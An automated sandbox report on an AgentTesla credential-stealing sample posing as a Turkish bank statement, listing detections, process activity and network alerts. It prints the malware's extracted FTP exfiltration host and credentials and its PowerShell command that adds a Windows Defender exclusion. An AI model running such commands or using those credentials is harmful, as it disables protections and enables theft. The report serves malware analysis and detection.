Windows Analysis Report
hesaphareketi-.exe

Overview

General Information

Sample name: hesaphareketi-.exe
Analysis ID: 1463495
MD5: c96c8178b1018515d4b43e614a3e3f15
SHA1: 8a6601c7aff694ba0843e807a7a1a57bc3cb3665
SHA256: 2ca8a08a83d98fbae1d8683cdb828b64216f9849ee539e09198db53876d419e9
Tags: AgentTesla, exe, geo, TUR

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareketi-.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C96C8178B1018515D4B43E614A3E3F15)
    • powershell.exe (PID: 6640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareketi-.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C96C8178B1018515D4B43E614A3E3F15)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
0.2.hesaphareketi-.exe.3666088.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.hesaphareketi-.exe.3666088.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.hesaphareketi-.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
4.2.hesaphareketi-.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.hesaphareketi-.exe.3666088.3.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (strings listed below)
  • 0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 5740, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 6640, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 5740, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 6640, ProcessName: powershell.exe

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
06/27/24-09:19:54.944296 | 2029927 | 49703 | 21 | TCP | A Network Trojan was detected
06/27/24-09:19:55.631016 | 2851779 | 49706 | 53607 | TCP | A Network Trojan was detected
06/27/24-09:19:55.631016 | 2855542 | 49706 | 53607 | TCP | A Network Trojan was detected

AV Detection

Source: hesaphareketi-.exe, Avira: detected
Source: http://ftp.normagroup.com.tr, Avira URL Cloud: Label: malware
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
Source: ftp.normagroup.com.tr, Virustotal: Detection: 10%
Source: http://ftp.normagroup.com.tr, Virustotal: Detection: 10%
Source: hesaphareketi-.exe, Virustotal: Detection: 36%
Source: hesaphareketi-.exe, ReversingLabs: Detection: 39%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: hesaphareketi-.exe, Joe Sandbox ML: detected
Source: hesaphareketi-.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: hesaphareketi-.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 4x nop then jmp 0757E1A5h, 0_2_0757E2A5

Networking

Source: Traffic, Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.7:49703 -> 104.247.165.99:21
Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.7:49706 -> 104.247.165.99:53607
Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49706 -> 104.247.165.99:53607
Source: global traffic, TCP traffic: 104.247.165.99 ports 51969,62952,57594,51081,62559,1,60734,2,52184,52196,54168,61079,53536,49465,53607,51869,21
Source: global traffic, TCP traffic: 192.168.2.7:49706 -> 104.247.165.99:53607
Source: Joe Sandbox View, IP Address: 104.247.165.99
Source: Joe Sandbox View, ASN Name: ASN-QUADRANET-GLOBALUS
Source: unknown, FTP traffic detected: 104.247.165.99:21 -> 192.168.2.7:49703
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 17 of 50 allowed.
    220-Local time is now 10:19. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: ftp.normagroup.com.tr
Source: hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ftp.normagroup.com.tr
Source: hesaphareketi-.exe, 00000000.00000002.1238001511.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hesaphareketi-.exe, 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, SKTzxzsJw.cs, .Net Code: TFawXa
Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, SKTzxzsJw.cs, .Net Code: TFawXa
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareketi-.exe
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Process Stats: CPU usage > 49%
Source: hesaphareketi-.exe, 00000000.00000002.1246725110.0000000005D50000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameRT.dll. vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000000.00000002.1238568331.00000000037F4000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000000.00000002.1238001511.000000000264C000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000000.00000000.1212257269.00000000002C4000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamevWuz.exeP vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000000.00000002.1249571927.0000000007A80000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000000.00000002.1233843643.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi-.exe
Source: hesaphareketi-.exe, 00000004.00000002.3677419170.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi-.exe
Source: hesaphareketi-.exe, Binary or memory string: OriginalFilenamevWuz.exeP vs hesaphareketi-.exe
Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: hesaphareketi-.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 4JJG6X.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 8C78isHTVco.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, CqSP68Ir.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, CqSP68Ir.cs, Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.cs, Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, apNwUAYQDNK2jjOBr5.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, apNwUAYQDNK2jjOBr5.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, apNwUAYQDNK2jjOBr5.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@7/6@1/1
Source: C:\Users\user\Desktop\hesaphareketi-.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-.exe.log
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3432:120:WilError_03
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Mutant created: \Sessions\1\BaseNamedObjects\mEkloRXObV
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbbsthxn.no0.ps1
Source: hesaphareketi-.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\hesaphareketi-.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hesaphareketi-.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\hesaphareketi-.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: hesaphareketi-.exeVirustotal: Detection: 36%
                      Source: hesaphareketi-.exeReversingLabs: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, userenv.dll, amsi.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, edputil.dll, windowscodecs.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: hesaphareketi-.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: hesaphareketi-.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.cs .Net Code: EvP8jij8d0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.cs .Net Code: EvP8jij8d0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.cs .Net Code: EvP8jij8d0 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Code function: 0_2_0573DBCB push CC057E19h; iretd 0_2_0573DBD5
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Code function: 0_2_0577E420 push 0000C3FBh; ret 0_2_0577E435
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Code function: 0_2_0577A4CB push 0000C3FBh; ret 0_2_0577A4E8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Code function: 4_2_067D42E8 push eax; iretd 4_2_067D42E9
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Code function: 4_2_067D3E40 pushfd ; retf 4_2_067D3E45
                      Source: hesaphareketi-.exe Static PE information: section name: .text entropy: 7.927355797624177
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack (unpacked .cs classes): High entropy of concatenated method names
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, zmiQjjSMJdWZJXd8i5.csHigh entropy of concatenated method names: 'N5QUywLRor', 'KTtUI9fgoB', 'YlCU8rcBAD', 'dfdUF2QpZ2', 'TLNUrE9gee', 'BE1UNcom57', 'f0dUDIpLWx', 'QFKc4rlyZF', 'Kb3c7p6UmA', 'XsVclN12jH'
